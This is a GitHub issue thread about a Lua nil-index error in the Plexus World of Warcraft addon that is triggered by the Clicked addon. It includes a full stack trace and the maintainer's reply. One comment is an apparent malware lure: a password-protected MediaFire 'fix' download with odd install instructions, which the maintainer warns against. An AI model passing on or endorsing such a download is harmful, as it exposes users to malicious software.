### ISSUE TITLE
[Bug] Lua Error

### ISSUE THREAD

**Issue by wheatbread** [doadin/Plexus#102]
**Describe the bug**
I received this error:

10x Plexus/Frame.lua:146: attempt to index field 'db' (a nil value)
[string "=[C]"]: ?
[string "=[C]"]: ?
[string "@Blizzard_FrameXML/RestrictedFrames.lua"]:674: in function <Blizzard_FrameXML/RestrictedFrames.lua:673>
[string "@Blizzard_FrameXML/RestrictedFrames.lua"]:812: in function `CallMethod'
[string "   RegisterUnitWatch(self)
   self:SetAttribute("*type1", "target")
   self:SetAttribute("useparent-toggleForVehicle", true)
   self:SetAttribute("useparent-allowVehicleTarget", true)
   self:SetAttribute("useparent-unitsuffix", true)

   local header = self:GetParent()
   if header:GetAttribute("unitsuffix") == "pet" then
      self:SetAttribute("useOwnerUnit", true)
      self:SetAttribute("unitsuffix", "pet")
   end

   local click = header:GetFrameRef("clickcast_header")
   if click then
      click:SetAttribute("clickcast_button", self)
      click:RunAttribute("clickcast_register")
   end

   header:CallMethod("initialConfigFunction")

   self:SetWidth(36)
   self:SetHeight(36)
   self:SetAttribute("initial-width", 36)
   self:SetAttribute("initial-height", 36)
   local attr = self:GetAttribute("*type2")
   if attr == "togglemenu" or attr == nil then
      self:SetAttribute("*type2", "togglemenu")
   end
"]:19: in function <[string "   RegisterUnitWatch(self)..."]:1>
[string "=(tail call)"]: ?
[string "=[C]"]: ?
[string "@Blizzard_FrameXML/RestrictedExecution.lua"]:483: in function <...aceBlizzard_FrameXML/RestrictedExecution.lua:446>
[string "@Blizzard_FrameXML/SecureGroupHeaders.lua"]:116: in function <...faceBlizzard_FrameXML/SecureGroupHeaders.lua:110>
[string "@Blizzard_FrameXML/SecureGroupHeaders.lua"]:173: in function <...faceBlizzard_FrameXML/SecureGroupHeaders.lua:130>
[string "@Blizzard_FrameXML/SecureGroupHeaders.lua"]:495: in function <...faceBlizzard_FrameXML/SecureGroupHeaders.lua:394>
[string "=[C]"]: in function `Show'
...
[string "@AlwaysRaw/Libs/AceAddon-3.0-13/AceAddon-3.0.lua"]:66: in function <AlwaysRaw/Libs/AceAddon-3.0/AceAddon-3.0.lua:61>
[string "@AlwaysRaw/Libs/AceAddon-3.0-13/AceAddon-3.0.lua"]:523: in function <AlwaysRaw/Libs/AceAddon-3.0/AceAddon-3.0.lua:516>
[string "=(tail call)"]: ?
[string "=(tail call)"]: ?
[string "@Plexus/Core.lua"]:848: in function `EnableModules'
[string "@Plexus/Core.lua"]:643: in function <Plexus/Core.lua:636>
[string "=[C]"]: ?
[string "@AlwaysRaw/Libs/AceAddon-3.0-13/AceAddon-3.0.lua"]:66: in function <AlwaysRaw/Libs/AceAddon-3.0/AceAddon-3.0.lua:61>
[string "@AlwaysRaw/Libs/AceAddon-3.0-13/AceAddon-3.0.lua"]:523: in function `EnableAddon'
[string "@AlwaysRaw/Libs/AceAddon-3.0-13/AceAddon-3.0.lua"]:626: in function <AlwaysRaw/Libs/AceAddon-3.0/AceAddon-3.0.lua:611>

Locals:

**To Reproduce**
I've figured it out--it starts erroring as soon as I enable the addon Clicked.  Is there any way they can be made compatible, please?  I need Clicked for the keybinds.  

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**
 - OS: Windows 11
 - Version: v3.3.3
 - Game Version: 11.0.2

**Additional context**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by doadin** [comment]
if you saw that persons post to download and run a program I hope you didnt, never a good idea.

**Comment by doadin** [comment]
Unfortunatly I think this is something "Clicked" would have to fix. SInce it only happens when that is enabled it is likely the cause. This is why most authors say to disable all others and see if it still happens.
